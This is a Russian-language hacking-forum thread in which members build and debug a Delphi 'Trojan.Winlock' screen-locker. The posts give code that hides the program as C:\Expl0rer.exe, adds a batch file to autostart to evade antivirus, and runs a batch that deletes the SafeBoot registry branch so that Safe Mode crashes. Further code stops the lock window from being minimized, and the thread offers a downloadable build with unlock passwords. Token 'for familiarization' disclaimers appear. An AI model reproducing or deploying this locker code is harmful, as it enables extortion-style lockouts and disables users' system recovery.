• Уменьшение отступа

    Обратная связь

    (info@ru-sfera.pw)

Простенький Trojan.Winlock на делфи


X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
Да я понял))Безопасный режим на семёрке работает,даже если запускать из-под администратора.Локер можно свернуть комбинацией клавиш Win+D (затем просто закрыть и удалить).
Ну комбинацию можно запретить не проблема, а с безопасным режимом, похоже майкросовцы профиксили и эти ветки, что-то програмно не меняются и не удаляются...

Причём похоже профиксили с Win XP SP3, на SP2 это ещё работает !Отдыхай!!!
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Ну комбинацию можно запретить не проблема, а с безопасным режимом, похоже майкросовцы профиксили и эти ветки, что-то програмно не меняются и не удаляются...

Причём похоже профиксили с Win XP SP3, на SP2 это ещё работает !Отдыхай!!!
Клаву вообще лучше полность лочить.Ввод с помощью кнопок интерфейса.А безопасный режим убрать способ стопудово имеется.Только не у всех он катит почему-то.На HPC,один чел собрал.На виртуальной семёрке протестил,при входе в безопасный появляется BSOD и он это всё заснял на видео весь процесс,чтоб не тупили в комментариях недоброжелатели...
И опять же..у кого-то работает,а у кого -то нет.Загадка..ёпт:)
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
Клаву вообще лучше полность лочить.Ввод с помощью кнопок интерфейса.А безопасный режим убрать способ стопудово имеется.Только не у всех он катит почему-то.На HPC,один чел собрал.На виртуальной семёрке протестил,при входе в безопасный появляется BSOD и он это всё заснял на видео весь процесс,чтоб не тупили в комментариях недоброжелатели...
И опять же..у кого-то работает,а у кого -то нет.Загадка..ёпт:)
Немного времени появилось, модифицировал вирус:

1)Для скрытия вирус кладёт себя на диск С, да не просто, а скрывает себя, вот строчки кода:
Код:
 PathFile := 'C:\Expl0rer.exe';
  flag:=0;
  CopyFile(PChar(ParamStr(0)), PChar(PathFile), True);
  FileSetAttr(PathFile, faHidden or faSysFile);

2)Для запуска себя, вирус создаёт специальный батник, вот код создания батника:
Код:
AssignFile(f, 'C:\Expl0rer.bat');
  Rewrite(f);
  Writeln(f, '@echo off');
  Writeln(f, 'Title Expl0rer');
  Writeln(f, 'start C:\Expl0rer.exe');
  Flush(f);
  CloseFile(f);

Этот-же батник я добавил в автозагрузку, это тоже для скрытия и обхода антивирусов.

3)С безопасным режимом, вот что происходит, по умолчанию винда запрашивает подтверждение действия, на удаления этих строк, что-то долго не мог обойти, но всё-же решил проблему, для этого вирус создаст, ещё один батник и автоматически запустит его:
Код:
AssignFile(f, 'C:\Expl0rer2.bat');
Rewrite(f);
 
Writeln(f,'@ECHO OFF');
Writeln(f, 'ECHO Rebooting into Safe Mode');
Writeln(f,'echo Y|Reg delete "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\" /f');
Writeln(f,'cmd.exe');
Flush(f);
CloseFile(f);

Строка, как-раз и удаляет нужную ветку:echo Y|Reg delete "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\" /f

А обошёл подтверждение я, так называемым перенапровлением запроса:echo Y|

Ну и запуск батника из нашей проги:
Код:
ShellExecute(Form1.Handle, 'open', 'C:\Expl0rer2.bat',nil, nil, SW_SHOWNORMAL)

Вроде работает, пароль:111

ДЛЯ ОЗНАКОМЛЕНИЯ !!!
 

Вложения

  • NEW3.zip
    1.3 МБ · Просмотры: 18

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
ТЕСТИТЬ НА ВИРТУАЛКЕ, Т.К. ЗАБЫЛ РЕАЛИЗОВАТЬ ВОССТАНОВЛЕНИЕ ЗАГРУЗКИ БЕЗОПАСНОГО РЕЖИМА !

НУ И ПАРОЛЬ РАЗБЛОКИРОВКИ:Blondy Hacker
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Немного времени появилось, модифицировал вирус:
Я уже говорил о такой ситуаци выше:)У кого-то работает,а у кого-то нет.Запускал с правами администратора (пробовал несколько раз)-всё равно работает безопасный режим.Опять же можно свернуть с помощью WIN+D и тут же его удалить.В общем "семёра" хитрая сцуко...
P.S.Олег,подскажи,как сбросить настройки Delphi 7 по-умолчанию?Просто вчера собирал локер по одной статье.Всё вроде правильно,но выдаёт ошибку в коде в самом начале...типа неправильно написано обращение к окошку для ввода текста (edit).Начал смотреть почему,оказалось что произошла какая-то ошибка и оно назвала себя Component1 и отказалось редактировать это имя.Начал щёлкать наугад:)а буковки-то все английские падлы...вообщем удалось вернуть edit и возможность редактирования,но теперь при создании проекта он начинает выводить edit2(в ручную можно менять) и с окошка не убрать этот текст....вообщем не суть.Как сбросить настройки?
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
Я уже говорил о такой ситуаци выше:)У кого-то работает,а у кого-то нет.Запускал с правами администратора (пробовал несколько раз)-всё равно работает безопасный режим.Опять же можно свернуть с помощью WIN+D и тут же его удалить.В общем "семёра" хитрая сцуко...
Если отключон UAC, должно работать у всех, так для интереса, запусти батник: C:\Expl0rer2.bat он создаётся программой, ну или в блокноте на виртуалке сделай батник и запусти с таким кодом:
Код:
@ECHO OFF
ECHO Rebooting into Safe Mode
echo Y|Reg delete "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\" /f'
cmd.exe
Сделай скриншот !

Теперь по поводу WIN+D, вот фикс:

Создаём отдельную процедуру, для автоматического восстановления окна:
Код:
procedure TForm1.Restore(Sender: TObject);
begin
Application.Restore;
SetWindowPos(Application.Handle, HWND_TOPMOST, Left,Top,Width,Height,
SWP_NOMOVE or SWP_NOSIZE)
end;

Далее в TForm1.Create(Sender: TObject); добовляем строки:
Код:
Application.OnMinimize := Restore;
Application.OnDeactivate := Restore;

Должно работать, но не проверял, по поводу сброса настроек не подскажу, т.к. я не работаю с Делфи !Отдыхай!!!
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
Блин код второго батника немного не правильно написал, нужно без последней кавычки вот так:
Код:
@ECHO OFF
ECHO Rebooting into Safe Mode
echo Y|Reg delete "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\" /f
cmd.exe
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Всё равно работает:)Указан неправильный путь пишет.UAC отключен.Запуск от администратора.Там скрины после запуска батника и после винлокера.
Снимок.PNG Снимок.PNG1.PNG Снимок.PNG2.PNG
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
Ну так он удалил ветку, попробуй загрузить в безопасном режиме сейчас, там нужно подождать, должен-быть BSOD !

По последнему скрину, ветки HKEY_LOCAL_МACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot у тебя нет, так, что программа сработала как нужно, а почему у тебя всё-равно загружается, я не знаю, нужно разбираться, может какая защита в винде стоит...

И ещё все файлы и действия в этой теме запускать ТОЛЬКО на виртуалке и ОПЫТНЫМ пользователям, думаю это понятно, но всё-же, за возможный вред здесь никто отвечать не будет
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
опробуй загрузить в безопасном режиме сейчас, там нужно подождать, должен-быть BSOD !
Сейчас загрузился в безопасном режиме,но ничего не происходит.Может там какое-нибудь автоматическое восстановление реестра предусмотрено?
 
Верх Низ